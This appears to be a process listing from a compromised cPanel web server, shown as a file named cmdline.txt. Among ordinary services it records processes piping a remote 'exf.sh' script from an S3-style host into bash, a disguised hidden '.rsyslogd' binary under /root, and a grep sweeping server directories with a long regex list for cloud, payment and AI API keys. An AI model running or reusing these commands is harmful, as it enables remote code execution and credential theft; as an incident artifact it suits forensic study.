Edit File: cmdline.txt
[10536] /usr/sbin/httpd -k start [14015] /usr/sbin/httpd -k start [14023] /usr/sbin/httpd -k start [14024] /usr/sbin/httpd -k start [14026] /usr/sbin/httpd -k start [14028] /usr/sbin/httpd -k start [14029] /usr/sbin/httpd -k start [14030] /usr/sbin/httpd -k start [14031] /usr/sbin/httpd -k start [14033] /usr/sbin/httpd -k start [14780] /usr/sbin/exim -ps -bd -q60m -oP /var/spool/exim/exim-daemon.pid [1638] dnsadmin - dormant mode [17338] cPhulkd - dbprocessor [17401] wget -qO- https://amzn-s3-buckets-egalo.s3.eu-north-1.amazonaws.com/exf.sh [17402] bash -s -- [17414] /usr/sbin/nscd [17533] /usr/sbin/CROND -n [17534] /usr/sbin/CROND -n [17562] /bin/sh -c bash -c "sleep $((RANDOM % 1800))" ;imunify-antivirus imunify-patch subscriptions refresh > /dev/null 2>&1 [17563] /bin/sh -c bash -c "sleep $((RANDOM % 60))" ; /opt/imunify360/venv/share/imunify360/scripts/check-detached.py > /dev/null 2>&1 || : [17565] sleep 39 [17568] sleep 1730 [19603] /usr/sbin/chronyd [19622] /usr/sbin/xinetd -stayalive -pidfile /var/run/xinetd.pid [19639] /usr/sbin/smartd -n -q never [19687] /usr/sbin/atd -f [19730] /sbin/agetty --noclear tty1 linux [19832] /usr/sbin/lvmetad -f [19869] /usr/lib/systemd/systemd-udevd [19917] /usr/sbin/crond -n [19965] /usr/sbin/gssproxy -D [19986] cpanellogd - sleeping for logs [1] /usr/lib/systemd/systemd --system --deserialize 18 [20011] /usr/lib/polkit-1/polkitd --no-debug [20034] /usr/sbin/irqbalance --foreground [20983] /usr/lib/systemd/systemd-logind [20999] /root/.rsyslogd -c /root/.config.json [2107] [slub_flushwq] [21153] /usr/local/cpanel/3rdparty/perl/536/bin/perl -T -w /usr/local/cpanel/3rdparty/bin/spamd --allowed-ips=127.0.0.1,::1 --max-children=5 --pidfile=/var/run/spamd.pid --listen=5 --listen=6 [22433] tailwatchd [24270] spamd child [24271] spamd child [29875] /usr/lib/systemd/systemd-journald [3099] /usr/sbin/httpd -k start [3100] /usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=approve.wpcpanel.com --suffix=-bytes_log 
[3101] /usr/local/cpanel/bin/splitlogs --main=apache-traffic.log --mainout=/var/log/cpanel-server-traffic/web/traffic-apache.log [3102] /usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=approve.wpcpanel.com --mainout=/etc/apache2/logs/access_log [3103] /usr/local/cpanel/3rdparty/bin/perl /usr/local/cpanel/bin/leechprotect [3105] Passenger watchdog [3109] Passenger core [31594] lfd - sleeping [31616] /usr/sbin/mysqld [31653] /usr/bin/sw-engine /usr/local/cpanel/3rdparty/wp-toolkit/bin/run-script scheduled-tasks-executor.php [31655] /usr/bin/sw-engine /usr/local/cpanel/3rdparty/wp-toolkit/bin/run-script background-tasks-executor.php [31660] /usr/bin/imunify-agent-proxy [31669] sw-engine-fpm: master process (/etc/sw-engine/sw-engine-fpm.conf) [31705] /usr/sbin/sshd -D [31770] queueprocd - waiting up to 60s to process a task [31856] /usr/sbin/named -u named -c /etc/named.conf [3228] cpsrvd (SSL) - waiting for connections [32314] cPhulkd - processor [3231] /usr/local/cpanel/3rdparty/sbin/p0f -i any -u cpanelconnecttrack -d -s /var/cpanel/userhomes/cpanelconnecttrack/p0f.socket less 400 and not dst port 80 and not dst port 443 and tcp[13] & 8==0 [32409] cpdavd - accepting connections on: 2091, 2077, 2078 [32483] php-fpm: master process (/usr/local/cpanel/etc/php-fpm.conf) [489] php-fpm: master process (/opt/cpanel/ea-php80/root/etc/php-fpm.conf) [491] php-fpm: master process (/opt/cpanel/ea-php74/root/etc/php-fpm.conf) [493] php-fpm: master process (/opt/cpanel/ea-php81/root/etc/php-fpm.conf) [495] php-fpm: master process (/opt/cpanel/ea-php73/root/etc/php-fpm.conf) [499] php-fpm: master process (/opt/cpanel/ea-php70/root/etc/php-fpm.conf) [501] php-fpm: master process (/opt/cpanel/ea-php72/root/etc/php-fpm.conf) [770] /sbin/auditd [8021] wget -qO- https://amzn-s3-buckets-egalo.s3.eu-north-1.amazonaws.com/exf.sh [8022] bash -s -- [804] /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation [9942] bash -s -- [9945] 
grep -rI -oE AKIA[A-Z0-9]{16}|SG\.[0-9A-Za-z_-]{22}\.[0-9A-Za-z_-]{43}|sk_live_[A-Za-z0-9]{24,}|sk_test_[A-Za-z0-9]{24,}|rk_live_[A-Za-z0-9]{24,}|pk_live_[A-Za-z0-9]{24,}|xkeysib-[a-zA-Z0-9]{64}-[a-zA-Z0-9]{16}|ghp_[A-Za-z0-9_]{36}|gho_[A-Za-z0-9_]{36}|github_pat_[A-Za-z0-9_]{22}_[A-Za-z0-9_]{59}|glpat-[A-Za-z0-9_-]{20,}|AccountKey=[A-Za-z0-9+/=]{60,}|sk-[a-zA-Z0-9]{20,}|sk-ant-[a-zA-Z0-9_-]{40,}|sk-proj-[a-zA-Z0-9_-]{40,}|key-[a-zA-Z0-9]{32}|xoxb-[0-9]{10,}-[A-Za-z0-9]{20,}|xoxp-[0-9]{10,}-[A-Za-z0-9]{20,}|xoxs-[0-9]{10,}-[A-Za-z0-9]{20,}|dop_v1_[a-f0-9]{64}|npm_[a-zA-Z0-9]{36}|pypi-[A-Za-z0-9_-]{100,}|shpat_[a-fA-F0-9]{32,}|shpss_[a-fA-F0-9]{32,}|shppa_[a-fA-F0-9]{32,}|whsec_[A-Za-z0-9]{32,}|lin_api_[A-Za-z0-9]{40}|[0-9]{8,10}:AA[A-Za-z0-9_-]{33}|r[us]_live_[A-Za-z0-9]{24,}|AC[a-f0-9]{32}|EAA[A-Za-z0-9]{50,}|sq0atp-[A-Za-z0-9_-]{22,}|ATBB[A-Za-z0-9_-]{40,}|hf_[A-Za-z0-9]{34}|HRKU-AA[0-9A-Za-z_-]{58}|HEROKU[A-Z0-9_]*[=:][^|[:space:]]*[0-9a-f]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}|heroku[a-zA-Z0-9_.-]{0,32}[:=][^|[:space:]]*[0-9a-f]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}|[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12} /app /backup /data /etc /home /home/approve/ /home/backup/ /home/epublish/ /home/menziesgrp/ /home/nagios/ /home/rimernassoc/ /home/systembackadmin/ /home/tebaapprove/ /home/virtfs/ /opt /root /scripts /sites /srv /usr/local /var/www /web --exclude-dir=node_modules --exclude-dir=.next --exclude-dir=.pm2 --exclude-dir=dist --exclude-dir=build --exclude-dir=out --exclude-dir=coverage --exclude-dir=.cache --exclude-dir=.git --exclude-dir=.svn --exclude-dir=.hg --exclude-dir=__pycache__ --exclude-dir=vendor --exclude-dir=.heroku --exclude-dir=.nuxt --exclude-dir=.terraform --exclude-dir=Pods --exclude-dir=target --exclude-dir=.pnpm-store --exclude-dir=.yarn --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev --exclude-dir=snap --exclude-dir=lost+found --exclude=*.min.js --exclude=*.map --exclude=*.wasm* 
--exclude=*.bundle.js --exclude=*.chunk.js --exclude=*.pack --exclude=*.gz --exclude=*.br --exclude=*.bin --exclude=*.so --exclude=*.png --exclude=*.jpg --exclude=*.svg --exclude=*.ico --exclude=*.woff* --exclude=*.ttf --exclude=*.pdf --exclude=*.zip --exclude=*.tar --exclude=*.html